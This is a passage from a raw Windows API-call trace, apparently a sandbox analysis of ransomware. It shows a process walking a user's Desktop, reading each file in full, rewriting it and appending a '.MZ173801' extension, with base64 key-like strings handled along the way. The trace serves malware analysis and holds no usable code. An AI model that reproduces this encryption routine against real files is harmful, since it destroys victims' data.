lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x2f8d, lpOverlapped=0x0) returned 1 [0123.328] CloseHandle (hObject=0x410) returned 1 [0123.329] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sCm_S8YjQxWQT08.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\scm_s8yjqxwqt08.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.330] WriteFile (in: hFile=0x410, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x2f8d, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f9bc*=0x2f8d, lpOverlapped=0x0) returned 1 [0123.331] CloseHandle (hObject=0x410) returned 1 [0123.331] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\sCm_S8YjQxWQT08.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\scm_s8yjqxwqt08.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\sCm_S8YjQxWQT08.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\scm_s8yjqxwqt08.m4a.mz173801")) returned 1 [0123.331] GetCurrentThreadId () returned 0x1358 [0123.331] GetCurrentThreadId () returned 0x1358 [0123.331] GetCurrentThreadId () returned 0x1358 [0123.331] GetCurrentThreadId () returned 0x1358 [0123.331] GetCurrentThreadId () returned 0x1358 [0123.331] GetCurrentThreadId () returned 0x1358 [0123.331] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x374ae4e0, ftCreationTime.dwHighDateTime=0x1d5ef8d, ftLastAccessTime.dwLowDateTime=0xd5b99bf0, ftLastAccessTime.dwHighDateTime=0x1d5e90f, ftLastWriteTime.dwLowDateTime=0xd5b99bf0, ftLastWriteTime.dwHighDateTime=0x1d5e90f, nFileSizeHigh=0x0, nFileSizeLow=0x17ae4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sHCpH11jen-XYoy Od_.m4a", cAlternateFileName="SHCPH1~1.M4A")) returned 1 [0123.331] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.331] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.331] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\sHCpH11jen-XYoy Od_.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\shcph11jen-xyoy od_.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x374ae4e0, ftCreationTime.dwHighDateTime=0x1d5ef8d, ftLastAccessTime.dwLowDateTime=0xd5b99bf0, ftLastAccessTime.dwHighDateTime=0x1d5e90f, ftLastWriteTime.dwLowDateTime=0xd5b99bf0, ftLastWriteTime.dwHighDateTime=0x1d5e90f, nFileSizeHigh=0x0, nFileSizeLow=0x17ae4)) returned 1 [0123.332] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.332] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.332] GetCurrentThreadId () returned 0x1358 [0123.332] GetCurrentThreadId () returned 0x1358 [0123.332] GetCurrentThreadId () returned 0x1358 [0123.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.333] GetCurrentThreadId () returned 0x1358 [0123.333] GetCurrentThreadId () returned 0x1358 [0123.333] GetCurrentThreadId () returned 0x1358 [0123.333] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sHCpH11jen-XYoy Od_.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\shcph11jen-xyoy od_.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.333] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.333] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.333] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x17ae4 [0123.333] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.333] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x17ae4, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x17ae4, lpOverlapped=0x0) returned 1 [0123.335] CloseHandle (hObject=0x410) returned 1 [0123.347] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sHCpH11jen-XYoy Od_.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\shcph11jen-xyoy od_.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.348] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x17ae4, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x17ae4, lpOverlapped=0x0) returned 1 [0123.405] CloseHandle (hObject=0x410) returned 1 [0123.405] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\sHCpH11jen-XYoy Od_.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\shcph11jen-xyoy od_.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\sHCpH11jen-XYoy Od_.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\shcph11jen-xyoy od_.m4a.mz173801")) returned 1 [0123.406] GetCurrentThreadId () returned 0x1358 [0123.406] GetCurrentThreadId () returned 0x1358 [0123.406] GetCurrentThreadId () returned 0x1358 [0123.406] GetCurrentThreadId () returned 0x1358 [0123.406] GetCurrentThreadId () returned 0x1358 [0123.406] GetCurrentThreadId () returned 0x1358 [0123.406] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfb34e00, ftCreationTime.dwHighDateTime=0x1d5e0d6, ftLastAccessTime.dwLowDateTime=0xf3474630, ftLastAccessTime.dwHighDateTime=0x1d5eb3b, ftLastWriteTime.dwLowDateTime=0xf3474630, ftLastWriteTime.dwHighDateTime=0x1d5eb3b, nFileSizeHigh=0x0, nFileSizeLow=0x3554, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sNSbJ9-I2i0PpN.bmp", cAlternateFileName="SNSBJ9~1.BMP")) returned 1 [0123.406] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.406] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.406] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\sNSbJ9-I2i0PpN.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\snsbj9-i2i0ppn.bmp"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfb34e00, ftCreationTime.dwHighDateTime=0x1d5e0d6, ftLastAccessTime.dwLowDateTime=0xf3474630, ftLastAccessTime.dwHighDateTime=0x1d5eb3b, ftLastWriteTime.dwLowDateTime=0xf3474630, ftLastWriteTime.dwHighDateTime=0x1d5eb3b, nFileSizeHigh=0x0, nFileSizeLow=0x3554)) returned 1 [0123.407] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.407] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.407] GetCurrentThreadId () returned 0x1358 [0123.407] GetCurrentThreadId () returned 0x1358 [0123.407] GetCurrentThreadId () returned 0x1358 [0123.408] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.408] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 